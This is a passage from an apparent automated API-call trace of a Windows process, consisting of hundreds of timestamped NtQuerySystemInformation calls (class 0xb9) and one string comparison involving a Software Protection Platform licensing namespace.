NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd360, Length=0x28, ResultLength=0x0) [0207.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x50, ResultLength=0x0) [0207.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x50, ResultLength=0x0) [0207.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x50, ResultLength=0x0) [0207.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x28, ResultLength=0x0) [0207.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x20, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x20, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0207.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0207.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x28, ResultLength=0x0) [0207.921] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.922] 